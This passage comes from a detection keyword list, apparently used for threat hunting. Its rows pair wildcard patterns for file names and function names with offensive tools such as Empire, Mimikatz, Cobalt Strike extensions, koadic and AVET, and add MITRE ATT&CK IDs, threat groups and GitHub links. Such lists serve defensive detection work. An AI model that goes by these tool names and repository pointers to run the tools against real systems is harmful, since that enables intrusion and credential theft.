- T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*empire-priv.key*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - 
T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*EmpireProject*,offensive_tool_keyword,empire,Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent. and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side. Empire implements the ability to run PowerShell agents without needing powershell.exe. rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz. and adaptable communications to evade network detection. all wrapped up in a usability-focused framework. 
PowerShell Empire premiered at BSidesLV in 2015 and Python EmPyre premeiered at HackMiami 2016.,T1027 - T1059 - T1071 - T1070 - T1072,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,POST Exploitation tools,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Empire-Sponsors.git*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*empire-test-kalirolling*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - 
T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*emptybowl.py*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow allows a string passed to popen() call to be controlled by an attacker arbitraty cmd execute known to work only for AIMC Version 2.9.5.1,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Web Attacks,https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py,1,1,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*enable_persistence.py*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*Enable_Privilege /Process:* /Privilege:*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - 
TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*EnableAllParentPrivileges.c*,offensive_tool_keyword,PSBits,Simple tool enabling all privileges in the parent process (usually cmd.exe) token. Useful if you have SeBackup or SeRestore and need a cmd.exe ignoring all ACLs,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges,1,1,N/A,N/A,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*EnableAllParentPrivileges.exe*,offensive_tool_keyword,PSBits,Simple tool enabling all privileges in the parent process (usually cmd.exe) token. Useful if you have SeBackup or SeRestore and need a cmd.exe ignoring all ACLs,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges,1,1,N/A,N/A,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*Enabled_Users1.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Enable-DuplicateToken*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*EnableRDesktopImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*Enable-SeAssignPrimaryTokenPrivilege*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - 
APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Enable-SeDebugPrivilege*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1102,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Enable-SeDebugPrivilege*,offensive_tool_keyword,mimikatz,Invoke-Mimikatz.ps1 function name,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - 
T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*encdatavault2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*encfs2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*encode_payload rc4 *.txt*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*EncodeGroup/AggressiveProxy*,offensive_tool_keyword,cobaltstrike,Project to enumerate proxy configurations and generate shellcode from CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/AggressiveProxy,1,1,N/A,10,10,139,26,2020-11-04T16:08:11Z,2020-11-04T12:53:00Z -*EncodeGroup/UAC-SilentClean*,offensive_tool_keyword,cobaltstrike,New UAC bypass for Silent Cleanup for CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/UAC-SilentClean,1,1,N/A,10,10,173,32,2021-07-14T13:51:02Z,2020-10-07T13:25:21Z -*encodeScriptPolyglot*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*EncodeShellcode(*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*encrypt.py *.bin -p * -o *.enc*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,0,private github repo,10,,N/A,,, -*encrypt/encryptFile.go*,offensive_tool_keyword,cobaltstrike,Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/zha0gongz1/DesertFox,1,1,N/A,10,10,123,26,2023-02-02T07:02:12Z,2021-02-04T09:04:13Z -*encrypt/encryptUrl.go*,offensive_tool_keyword,cobaltstrike,Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/zha0gongz1/DesertFox,1,1,N/A,10,10,123,26,2023-02-02T07:02:12Z,2021-02-04T09:04:13Z 
-*Encrypt-Bytes*,offensive_tool_keyword,empire,empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1055,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*encrypted_payload*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*EncryptedPfx.py*,offensive_tool_keyword,ADFSpoof,A python tool to forge AD FS security tokens.,T1600 - T1600.001 - T1552 - T1552.004,TA0006 - TA0001,N/A,N/A,Sniffing & Spoofing,https://github.com/mandiant/ADFSpoof,1,0,N/A,10,4,300,52,2023-09-21T17:14:52Z,2019-03-20T22:30:58Z -*EncryptedZIP.csproj*,offensive_tool_keyword,EncryptedZIP,Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory,T1564.001 - T1027 - T1214.001,TA0005 - TA0010,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*EncryptedZIP.exe*,offensive_tool_keyword,EncryptedZIP,Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. 
This assembly also clears the key out of memory using RtlZeroMemory,T1564.001 - T1027 - T1214.001,TA0005 - TA0010,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*EncryptShellcode(*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,0,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*Endpoint-EE15B860-9EEC-EC11-BB3D-0022482CA4A7.json*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*ENDTHISFILETRANSMISSIONEGRESSASSESS*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data 
detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*ENDTHISFILETRANSMISSIONEGRESSASSESS*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*Enelg52/KittyStager*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*Engineer_super.exe*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*engjibo/NetUser*,offensive_tool_keyword,cobaltstrike,Use windows api to add users which can be used when net is unavailable,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 
